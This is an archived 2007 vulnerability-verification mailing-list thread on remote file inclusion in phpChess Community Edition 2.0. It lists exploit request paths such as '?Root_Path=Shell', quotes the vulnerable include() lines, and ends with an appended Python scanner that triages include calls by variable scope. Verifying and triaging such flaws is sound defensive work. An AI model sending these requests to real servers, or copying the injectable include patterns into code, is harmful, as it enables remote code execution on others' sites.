[VIM] Mostly True: phpChess Community Edition 2.0 RFI

str0ke str0ke at milw0rm.com
Mon May 7 16:02:33 UTC 2007


Removed the latter from 3837.

/str0ke

On 5/7/07, Heinbockel, Bill <heinbockel at mitre.org> wrote:
> MILW0RM:3837
> BID:23797
>
> # Exploit:[Path]/skins/phpchess/layout_admin_cfg.php?Root_Path=Shell
> TRUE: <?php
> include($Root_Path."skins/".$SkinName."/admin_header.php");?>
>
> # Exploit:[Path]/skins/phpchess/layout_cfg.php?Root_Path=Shell
> TRUE: <?php include($Root_Path."skins/".$SkinName."/header.php");?>
>
> # Exploit:[Path]/skins/phpchess/layout_t_top.php?Root_Path=Shell
> TRUE: <?php include($Root_Path."includes/cells/".$Contentpage);?>
>
> # Exploit:[Path]/includes/language.php?config=Shell
> FALSE: (included from a function definition called from outside of the
> file)
>         function GetStringFromStringTable($strTag, $config){
>
>                 include($config);
>                 ...
>
>
> William Heinbockel
> Infosec Engineer, Sr.
> The MITRE Corporation
> 202 Burlington Rd. MS S145
> Bedford, MA 01730
> heinbockel at mitre.org
> 781-271-2615
>
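The distinction Bill draws above (an include whose leading variable lives at file scope is reachable through register_globals; one whose variable is a function parameter is only as exposed as its callers) is easy to automate as a first-pass triage. The following scanner is an added example, not code from phpChess or from anyone on the list; it uses deliberately simple regexes, and its sample PHP is constructed from the shapes quoted in the thread rather than taken from the real phpChess files.

```python
"""Triage PHP include()/require() calls whose path starts with a variable.

Classification mirrors the thread's reasoning:
  - file-scope variable (or one pulled in with `global`): injectable under
    register_globals, so the RFI report is plausible as stated;
  - function parameter: the include is only reachable through callers, so
    the report needs a caller audit before it can be confirmed;
  - anything else: a function-local, look at how it is assigned.
Added example with simplistic parsing (brace counting, no string/comment
awareness); the sample source below is constructed, not real phpChess code.
"""
import re

# include/require with or without parentheses, where the first token is a variable
INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*\$(\w+)')
FUNC_RE = re.compile(r'\bfunction\s+\w+\s*\(([^)]*)\)')
GLOBAL_RE = re.compile(r'\bglobal\s+((?:\$\w+\s*,?\s*)+);')

FILE_SCOPE = "file-scope variable: injectable under register_globals"
PARAMETER = "function parameter: audit callers before calling it RFI"
LOCAL = "function-local variable: check how it is assigned"


def classify_includes(php_source):
    """Return a list of (line_number, variable_name, scope_verdict) tuples."""
    findings = []
    depth = 0            # current brace depth
    func_depth = None    # brace depth at which the enclosing function was declared
    opened = False       # whether that function's body brace has been seen yet
    params = set()       # parameter names of the enclosing function
    declared_global = set()

    for lineno, line in enumerate(php_source.splitlines(), 1):
        m = FUNC_RE.search(line)
        if m and func_depth is None:
            params = set(re.findall(r'\$(\w+)', m.group(1)))
            declared_global = set()
            func_depth, opened = depth, False

        g = GLOBAL_RE.search(line)
        if g and func_depth is not None:
            declared_global.update(re.findall(r'\$(\w+)', g.group(1)))

        for inc in INCLUDE_RE.finditer(line):
            var = inc.group(1)
            if func_depth is None or var in declared_global:
                scope = FILE_SCOPE
            elif var in params:
                scope = PARAMETER
            else:
                scope = LOCAL
            findings.append((lineno, var, scope))

        depth += line.count('{') - line.count('}')
        if func_depth is not None:
            if depth > func_depth:
                opened = True
            elif opened:
                # function body closed; back to file scope
                func_depth, opened = None, False
                params, declared_global = set(), set()
    return findings


# Constructed sample: the include shapes quoted in the thread, plus one
# `global` case to show the third path. Not the actual phpChess sources.
SAMPLE_PHP = """<?php
// constructed sample, not the real phpChess files
include($Root_Path."skins/".$SkinName."/admin_header.php");
include($Root_Path."includes/cells/".$Contentpage);

function GetStringFromStringTable($strTag, $config){
    include($config);
}

function LoadSkin($name)
{
    global $Root_Path;
    include($Root_Path."skins/".$name."/header.php");
}
"""

if __name__ == "__main__":
    for lineno, var, scope in classify_includes(SAMPLE_PHP):
        print(f"line {lineno}: ${var} -> {scope}")
```

Run against the constructed sample, the two top-level includes and the `global $Root_Path` case come back as file-scope (the TRUE entries above), while `include($config)` inside `GetStringFromStringTable` is reported as a parameter needing a caller audit (the FALSE entry). The scanner is a triage aid only: it does not see into strings or comments, and a parameter verdict says nothing about whether some caller passes user input through.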

